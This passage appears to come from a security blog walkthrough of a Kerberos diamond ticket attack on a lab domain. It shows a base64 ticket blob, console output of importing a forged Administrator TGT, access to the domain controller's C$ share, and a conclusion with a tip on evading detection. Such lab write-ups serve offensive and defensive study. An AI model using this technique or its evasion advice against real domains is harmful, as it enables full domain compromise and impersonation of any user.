5z8FYZ7jaTojPmaR5bD1+wpdn1PuhdjZ+h3ppHHYPgrH/snQPvO5U6jW5dkIjw/MneR0J6pgLPqCZ7/L xC4Jr2tq55EIkZxesqwPgYM63ogVcjsV/80Ey+dcU4zF9t3bVluuRz0v7vCDdR1CSwHUJGAeovW03GjI hw+Q3TCoYFJBhCrnKCmWaxe5HzzX5JsSIketkziUFrV0c8X0bDDKfpwQW7rZ6J3CvUnFbDrENr453zsz t42wEjjcjeiMvOzwfnHhmkKOeEE36eBJgZHHMK/hEVH7WeSMSK5wYvbXCVt9Q0gXRqo3zYAy5ccbyjht TBjuKQ/xsO+qAZAm0EPoGRkyzSapfr/NGblZC9slQi5XW4iHnHMBFOPAxT8HTah2TcfCtv6BVohIG81m V7tUrGfn2I4AR/dz3weEhsOuRO8ywBf952eZ1WmQ69+M+yqjB0IDCIaikLehSxfTKFKjgfcwgfSgAwIB AKKB7ASB6X2B5jCB46CB4DCB3TCB2qArMCmgAwIBEqEiBCCKbjp9Am+uC2DueQoTup4VO2XeocleiNQr E7iyCfLxj6ESGxBCT1JERVJHQVRFLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUA YKEAAKURGA8yMDI0MDQzMDE1MTY0NVqmERgPMjAyNDA1MDEwMDAwMzhapxEYDzIwMjQwNTA3MTQwMDM4 WqgSGxBCT1JERVJHQVRFLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBCT1JERVJHQVRFLkxPQ0FM [+] Ticket successfully imported! C:\Tools>klist Current LogonId is 0:0x192612 Cached Tickets: (1) #0> Client: Administrator @ BORDERGATE.LOCAL Server: krbtgt/BORDERGATE.LOCAL @ BORDERGATE.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize Start Time: 4/30/2024 18:16:45 (local) End Time: 5/1/2024 1:00:38 (local) Renew Time: 5/7/2024 18:00:38 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: C:\Tools>dir \\dc01\C$ Volume in drive \\dc01\C$ has no label. Volume Serial Number is 343D-F2D0 Directory of \\dc01\C$ 08/05/2021 09:20 <DIR> PerfLogs 28/04/2024 10:27 <DIR> Program Files 08/05/2021 10:40 <DIR> Program Files (x86) 28/04/2024 10:21 <DIR> Users 28/04/2024 10:35 <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 50,740,531,200 bytes free |
In Conclusion
Diamond tickets give an attacker the ability to assume the identity of any user in a domain, whilst being more difficult to detect over traditional golden ticket attacks.In addition, it’s always worth ensuring the tickets being generated blend in with the target environment.